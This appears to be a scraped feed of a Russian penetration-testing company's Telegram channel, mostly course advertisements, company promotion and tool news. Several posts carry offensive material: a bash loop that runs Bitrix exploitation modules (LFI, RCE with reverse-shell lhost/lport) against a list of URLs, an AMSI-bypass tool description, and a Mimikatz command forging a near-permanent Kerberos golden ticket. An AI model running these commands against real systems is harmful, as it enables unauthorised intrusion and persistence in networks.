7197
⚡️RESOLUTE ATTACK - Компания по информационной безопасности YouTube - https://www.youtube.com/@RESOLUTE-ATTACK Chat - @RESOLUTECHAT Web Site - www.resolute-attack.com Обратная связь - @ResoluteAttack_Bot
Мы готовы представить вам наш новый продукт, и это достойно вашего внимания! ⛈
THE WAY TO THE SENIOR (WTTS)
Пост читаем внимательно, так как инфы очень много, можно упустить суть и то почему мы шли к этому долгих 2 года. 🧐
Основываясь лишь на опыте и ошибках, мы начали разрабатывать новый продукт, завязанный на совершенно других принципах и методологии обучения.
Задача была не в том что бы просто бездумно пообещать вам что после успешного окончания курса вы сможете претендовать на должность в нашей или в любой другой компании которая занимается кибербезом или даже "гарантировать" вам трудоустройство, а визуально показать и доказать что это возможно. Оказывается для этого не нужен целый отдел который поможет вам найти работу. 😉 Что бы понять о чем я, смотрим PDF файл WTTS P1, а после мы продолжаем читать пост.
Для тех кто только вливается или хочет потрогать платформу, курс, род деятельности, будет доступен WTTS START абсолютно бесплатно. ❤️
Прикреплен PDF. P.S. Оставляем за собой право на расширение WTTS START, возможно не конечная версия.
Поскольку мы все адекватные и понимаем что люди склонны к выгоранию и так далее, наш нелегкий путь до работы мечты будет разделен на множество небольших этапов, после WTTS START и первой части WTTS вы можете претендовать на должность стажера, да, это негусто, но согласно последней версии матрицы компетенций 1221 RC это до 60000Р, таких вакансий довольно мало, но их можно урвать, ну и естественно кратно окупиться, а ведь это только начало.
❗️Обязательно к прочтению:
Подробно о всех достоинствах и нововведениях вы можете узнать в Телеграф. Информации действительно очень много.
Ссылка отдельно (https://telegra.ph/THE-WAY-TO-THE-SENIOR-06-21).
А цена как всегда крайне демократичная:
21000Р 16990Р - на первый поток обучения. 😊
Обращаться на запись можно к @netrunner_1G или ко мне напрямую @TripiniFKYL.
Старт обучения планируется на 15 Августа.
P.S. Возможны задержки связанные с разработкой платформы.
Мы выделяемся на фоне других очень "популярных" агрегаторов обучения, материал делают действительно профессионалы своего дела, которые активно участвуют в текущих пентест заказах нашей компании.
С любовью к комьюнити, команда NETRUNNER GROUP ❤️
👋 У Вас популярный канал — @RESOLUTEATTACK. Вашему каналу теперь доступно оформление внешнего вида, которое выделит его среди других.
Настройки оформления — это эксклюзивный набор опций; Ваш канал должен достичь определённого уровня, чтобы Вы могли применить каждую из них. Предложите подписчикам проголосовать за канал по ссылке: /channel/RESOLUTEATTACK?boost. Чем больше у канала голосов, тем выше его уровень. С каждым новым уровнем открывается ещё больше возможностей.
Вы также можете 🎁 разыграть призы; по итогам розыгрыша случайные подписчики получат Telegram Premium в подарок. За каждую разыгранную подписку Ваш канал получит 4 голоса. С недавнего времени проводить розыгрыши стало ещё удобнее — теперь Вы можете выбрать увеличенный срок проведения розыгрыша, добавить собственные призы и автоматически опубликовать список победителей при подведении итогов.
С Новым годом! Желаем всего наилучшего Вам и Вашим подписчикам! 🚗
🔥 quick-trics_auto.sh
Когда-то я выкладывал пост про интересную тулзу для быстрой проверки Bitrix на наличие простых уязвимостей. И я писал, что мол написал скрипт, но с вами им не поделился 🌚
Исправляюсь! Переписал скрипт, теперь он будет бегать по всем урлам построчно и проверять на всё что только можно из этого инструмента, кроме XSS, т.к. модуль фолзит, из-за того, что нагрузка тупо вставляется и если 200, то он пишет что якобы XSS нашёл, но в 99,999% случаев, сайт просто проглотит нагрузку и ничего не случиться.
#!/bin/bash
echo "Lauch netcat for revshells"
printf "Enter IP ($(curl -s 2ip.ru)): "
read $IP
printf "Enter Port: "
read $PORT
for ((i=1; i <= $(wc -l scope.txt | awk '{print $1;}'); i++))
do
quick-tricks spoofing -u $(sed -n "$i p" scope.txt)
quick-tricks redirect -u $(sed -n "$i p" scope.txt)
quick-tricks lfi -u $(sed -n "$i p" scope.txt)
quick-tricks recon -a -u $(sed -n "$i p" scope.txt)
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 2
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 4
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 7
quick-tricks rce html-editor -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT
done
Запись вчерашнего стрима, мини обзор web версии.
Запиь в облаке - https://cloud.mail.ru/public/Fr7y/CkhWFerFE
SharpKiller
Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8
Live scan for new powershell processes every 0.5 seconds -> Automatically patches new powershell instances
Уверенно можем сказать, что это потенциальный аналог мальтего в будущем, работы для этого предстоит ещё очень много
Читать полностью…
RAS-X | SI VIS PACEM, PARA BELLUM | RESOLUTE ACTIVE SECURITY - X
⚡️ Компания RESOLUTE ATTACK представляет уникальное для России предложение и новый продукт RAS X - RESOLUTE ACTIVE SECURITY X
https://youtu.be/EOfbLgUeb9E?feature=shared
Давненько не было постов, начнем с начала! ⛈
Мы прошли долгий путь от простого Discord сервера до компании, помогающей в изучении такого нелегкого искусства как pentest и взращивающей этичных хакеров.
Мы все еще придерживаемся нашей идеологии и не выкладываем рекламу сомнительных услуг, скама и чернухи.
Мы уважаем и любим каждого нашего подписчика, ведь мы с вами состоим в этом сообществе NETRUNNER GROUP, где вам всегда будут рады.
Уже провели 2 потока по подготовке к сертификации от компании RESOLUTE ATTACK. Было много трудностей, но мы продолжаем работать над этим замечательным проектом, где за хорошую цену вы получите максимум знаний для прохождения сертификации и дальнейшего трудоустройства.
Торжественно анонсируем и стартуем продажи мест на FFPRTT.
Мы решили ограничить количество мест до 15, дабы уделить каждому ученику должное внимание. Наш репетиторский курс не ограничивается теорией и практикой. Мы также придерживаемся традиции проводить занятия F2F с учениками и даем возможность узнать больше чем доступно в материале курса для полного погружения в профессию.
Третий поток сможет познакомиться с нововведениями в обучении, о которых мы расскажем чуть позже.
Третий поток начинается с 16 октября.
Цена остается неизменной.
Цена: 15000Р
Длительность: 2 месяца ( Oct 16.2023 - Dec 16.2024 )
По всем вопросам писать: @netrunner_1G
Весь материал останется с вами, материал улучшается с каждым потоком, это значит что присоединившись к нам однажды , вы получите качество навсегда ❤️
Si vis pacem, para bellum
Затишье перед бурей всегда было нашей отличительной чертой. RESOLUTE ATTACK умеет удивлять, и в этот раз мы это доказываем.
🟥 RESOLUTE ATTACK всегда отличалось своим агрессивным и жёстким стилем.
Мы официально заявляем, что мы единственная компания в мире, которая предоставляет высококвалифицированную комплексную безопасность. От информационной до физической.
Представляем вам наше новое направление - RESOLUTE ACTIVE SECURITY X (RAS-X) ⚡️
Команда профессионалов мирового уровня - лучшие в мире, с огромным опытом работы на всех уровнях и опытом успешной работы в реальных боевых действиях, множество государственных наград подтверждающих уровень и признание.
Первый комплект сертификатов уже получили наши выпускники
Читать полностью…
КРЕАТИВ ОТ НАШИХ ДИЗАЙНЕРОВ 😍
P.S работают в Wallpaper Engine в том числе
Разгадывая Тайны Race Condition: Уязвимость, Скрывающаяся в Параллельной Обработке Данных
⚡️⚡️⚡️
https://telegra.ph/Race-Condition-08-15
FBI открыло охоту на продавцов баз данных
Недавно появившаяся в открытом доступе стенограмма судебного разбирательства в США в восточном округе Вирджинии открывает нам очень любопытные факты по поводу действий агентов ФБР по раскрытию личностей продавцов баз данных на широко известном форуме по утечкам данных в даркнете BreachForums, создатель которого Конор Брайан Фитцпатрик под ником Pompompurin заявлял ранее о своей ответственности за взлом электронной почты ФБР
Забавный факт: только мы будем репостить свои утечки
Забавное предложение: может ребятам подкинуть актуалочку?
Лего OSINT своими руками 😅😁😨, это вам не GPT чаты.
Это вам на 6к подписчиков.
CTF успех и у ламера есть, решенный Portswigger с HTB для мужчины - честь 🤌
Читать полностью…
CrackMapExec - все...
переходим на NetExec
Вышла обнова v1.1.0 - nxc4u, новые фичи типа Kerberos Constrained Delegation, Execute Tasks on behalf of logged-on Users with Scheduled Tasks, BloodHound now supports computer accounts, FTP Enhancement, Module sorting, WinRM improvements и др
https://www.netexec.wiki
Ставиться проще простого через pipx
apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
NetExec
nxc
nxcdb
netexec
nxcdb
Читать полностью…
alias cme=netexec
alias crackmapexec=netexec
⚡️ Компания RESOLUTE ATTACK поддерживает разработку open source инструментов для пентеста
RA помогает в разработке документации на русском, английском языке и в популяризации инструмента для Lateral Movement - GOST v3
Одной из особенностей нашего инструмента является возможность создания множества цепочек перенаправления, что является Must Have в тестировании AD и больших корпоративных сетях
Мы также создали бота для обратной связи, где вы можете напрямую обратиться к разработчикам данного инструмента и помочь в улучшении его - @gogostbot
Документация: https://gost.run/en/
GitHub: https://github.com/go-gost/gost
/channel/osint_san_framework?livestream=044837696e686ad90d
Стрим по новому инструменту через 40 минут. Обязательно приходим
Добрый день участник, ты нам нужен!
У нас есть два публичных отдела, отдел расследований и отдел контента. Именно там происходит работа над сообществом и нам нужны люди!
— Отдел Расследований (NPID) занимается расследованиями публичных некоммерческих кейсов, разработкой методологий поиска информации по зарубежью и чуть-чуть черной магией. Если у тебя уже есть опыт в OSINT и ты хочешь развить свои навыки работая в команде, то тебе к нам! Примером его работы является недавний кейс по Ronaldo 18K;
— Отдел Контента (NPCD) занимается формированием новостей, следит за новостями из мира Разведки и всячески формулирует наше видение OSINT-индустрии. Если у тебя есть опыт копирайтинга, редактуры, или тебе интересно разобраться в индустрии, то тебе сюда! Примером его работы является наш ежемесячный #vestnik
Для того что б попасть в нашу команду, пиши: @northen_palmyra
Немногие знают о существовании фичи, которую использовать нельзя, она позволяет создавать бесконечный golden ticket. С грустью вспоминаю те времена, когда можно было создать golden ticket без существующей учётки в домене
Я думаю, все знают, что по стандарту золотой билет создаётся на 10 лет. И все понимают, что существуют настраиваемые политики домена. Но командой /endin: можно корректировать время жизни тикета в минутах
Remi Solberg из offsec выяснил (бородой покруче чем у берсерка) путём несложной игрой битами, что максимальное время жизни golden ticket - 2147483647 минут. Это примерно 4000 лет. Но детект не заставит вас долго ждать. Или у вас это просто не получится сделать, так как все админы находятся в Protected Users. Использовать не рекомендую
Mimikatzkerberos::golden /user:user /domain:domain /sid:domainsid /krbtgt:hash /endin:2147483647 /ticket:названиеTadn3wb
⚡️ Услуга RED TEAM выходит на новый уровень
Задачи красной команды перед синей, теперь становится многообразней и обширней
RED TEAM X - самый эффективный и информативный вид тестирования служб безопасности организации, ее сервисов, служб, персонала и процессов
Теперь мы можем проверить не только эффективность мер информационной защиты и “Blue Team”, но теперь обладаем обширными возможностями по проверке работы физической службы безопасности, а также физических средств защиты информации
➡️ Подробнее - https://www.resolute-attack.com/Services/Rasx
Заметки ненастоящего сварщика. Как я сдавал BSCP
Автор - @kitovras
Читать
В нашей истории в телеграмм появился инсайд, есть ещё один инсайд. Хотите увидеть?
BOOST ❗️